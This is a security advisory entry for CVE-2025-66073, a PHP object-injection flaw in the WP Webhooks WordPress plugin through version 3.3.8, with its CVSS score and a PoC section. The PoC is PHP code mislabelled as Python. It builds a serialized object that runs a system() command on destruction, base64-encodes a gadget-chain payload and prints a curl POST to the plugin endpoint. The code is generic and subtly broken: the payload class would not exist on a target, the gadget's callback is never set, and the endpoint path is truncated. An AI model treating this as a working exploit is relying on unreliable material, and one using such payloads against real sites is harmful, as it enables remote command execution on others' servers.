Deserialization of Untrusted Data vulnerability in Cozmoslabs WP Webhooks wp-webhooks allows Object Injection.This issue affects WP Webhooks: from n/a through <= 3.3.8.
CVSS Details
CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Configurations (Affected Products)
No configuration data available.
WP Webhooks <= 3.3.8
PoC / Exploit Code
⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?php
/**
* CVE-2025-66073 PoC - WP Webhooks Object Injection
* Affected: WP Webhooks <= 3.3.8
* Vulnerability: Deserialization of Untrusted Data
*
* This PoC demonstrates how to construct a malicious payload for object injection.
* The actual exploitation requires a suitable POP chain in the target environment.
*/
// Example malicious serialized object structure
class MaliciousPayload {
public $cmd;
function __construct() {
$this->cmd = 'whoami'; // Command to execute
}
function __destruct() {
// This magic method will be called during deserialization
// In real attack, this would be part of a POP chain
system($this->cmd);
}
}
// Generate malicious serialized payload
$maliciousObject = new MaliciousPayload();
$payload = serialize($maliciousObject);
// Alternative: Using known POP chain gadgets (example)
class GadgetChain {
public $callback;
function __wakeup() {
if (isset($this->callback)) {
call_user_func($this->callback);
}
}
}
// Construct the attack payload for HTTP POST request
$attackPayload = serialize(new GadgetChain());
$attackPayload = base64_encode($attackPayload);
echo "Malicious Payload (base64):\n";
echo $attackPayload . "\n\n";
echo "Usage: Send this payload via POST to WP Webhooks endpoint\n";
echo "Example: curl -X POST 'https://target.com/wp-json/wp-webhooks/v1/...' -d 'data=" . $attackPayload . "'\n";
?>